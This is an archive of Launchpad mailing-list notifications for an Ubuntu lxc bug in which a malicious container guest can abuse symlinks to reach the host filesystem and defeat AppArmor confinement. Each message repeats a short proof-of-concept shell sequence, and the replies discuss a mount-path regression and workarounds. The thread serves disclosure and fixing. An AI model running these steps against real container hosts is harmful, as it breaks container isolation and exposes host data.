Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
@roman-fiedler We're using absolute mount targets here, so that might help. Will try this out. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
@roman-fiedler Might point to the same, but we already have relative mount targets: lxc.mount.entry = proc /var/lib/our_containers/123/rootfs/proc proc nosuid,nodev,noexec 0 0 So that won't help as suggested in the mail. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
I have a similar problem (but not with /proc).
***Roman Fielder's link (above) suggests the correct work around.***
My lxc configuration file has the following line:
> lxc.mount.entry = /data/references
/var/lib/lxc/noteServer/rootfs/data/references none ro,bind 0 0
(Note that the mount directory is an **absolute** path)
My resulting error message (in /var/log/lxc/noteServer.log) is:
> lxc-start 1443599663.225 ERRORlxc_utils -
utils.c:ensure_not_symlink:1384 - Mount onto /usr/lib/x86_64-linux-
gnu/lxc//data/references resulted in /usr/lib/x86_64-linux-
gnu/lxc/data/references
Tracing through the apt-get source lxc code I think the offending code
(in the mount_entry_on_absolute_rootfs function in the
lxc-1.0.7/src/lxc/conf.c file) is:
>aux = strstr(mntent->mnt_dir, path);
>if (aux) {
>offset = strlen(path);
>goto skipabs;
>}
>
>skipvarlib:
>aux = strstr(mntent->mnt_dir, rootfs->path);
>if (!aux) {
>WARN("ignoring mount point '%s'", mntent->mnt_dir);
>goto out;
>}
>offset = strlen(rootfs->path);
>
>skipabs:
>
>r = snprintf(path, MAXPATHLEN, "%s/%s", rootfs->mount,
> aux + offset);
Note that the last line should (probably -- I have not compiled any code
to test this) be:
>r = snprintf(path, MAXPATHLEN, "%s/%s", rootfs->mount,
> aux + offset + 1);
The "+1" then skips over the "/" in the mntent->mnt_dir so there will
only be *one* "/" in the resulting path.
Note that the work around in Roman Fiedler's link ensures that the mount
entry uses the mount_entry_on_relative_rootfs function (which works)
rather than the (currently broken?) mount_entry_on_absolute_rootfs
function.
I can confirm that the following configuration line:
> lxc.mount.entry = /data/references data/references none ro,bind 0 0
now in fact works, since it specifies a **relative** mount directory and
so invokes the mount_entry_on_relative_rootfs function.
Many thanks for excellent **open source** tools!
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662
Title:
lxc-start symlink vulnerabilities may allow guest to read host
filesystem, interfere with apparmor
Status in lxc package in Ubuntu:
Fix Released
Bug description:
lxc-start shuffles around mounts using helper directory
/usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)
It then modifies mounts operating in guest root directory before
invoking init. As it does not check if all mount points are
directories, a malicious guest may modify its internal structure
before shutdown (or was created using manipulated image) and then when
started again, guest may
* Access the whole host root filesystem
* Block switching from lxc-start apparmor profile to lxc-container-
default
# Real putold before pivot-root (root fs will end here)
mkdir -p /x/lxc_putold
# Faked putold
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
# proc fake
mkdir -p /x/proc
umount /proc
rmdir /proc
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr
/usr/lib/x86_64-linux-gnu/lxc/x/proc/self
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status
The issue was also found during
https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
@Stephen Gaito and @Roman Fiedler: Thanks for your hints! Using **relative** paths definitely helps also within the container fstab file. However it would be very helpful if lxc would accept the absolute paths again: fstab that fails with 1.0.7-0ubuntu0.5: /home/MYUSER/somemountpoint /var/lib/lxc/CONTAINERNAME/rootfs/home/MYUSER none defaults,bind 0 0 fstab that works with 1.0.7-0ubuntu0.5: /home/MYUSER/somemountpoint home/MYUSER none defaults,bind 0 0 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Relative paths are definately recommended over absolute paths, but the breaking of absolute paths will be fixed. Can anyone who's having trouble who is not on trusty please comment? I'd like to make sure that is the only problem. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
I'm not so deep in LXC to know how the design/specification is done for that. Discussion of "features" might therefore suite the lxc-users mailing list better. The other thing is, if Ubuntu would treat that part of new behaviour of LXC affecting some users as "regression" and hence might act on that. I do not know, who would be up to decide that. Perhaps someone from Ubuntu could comment on that. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Hello - Is anyone seeing this regression on a release other than 14.04 LTS (Trusty)? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Is 12.04 Precise affected by this vulnerability? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Chances are it is, but lxc in precise is in universe and on an unsupported upstream release, so we're not doing security updates there. You can however use the upstream LXC PPA which will get you trusty's LXC on precise, including this security fix. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
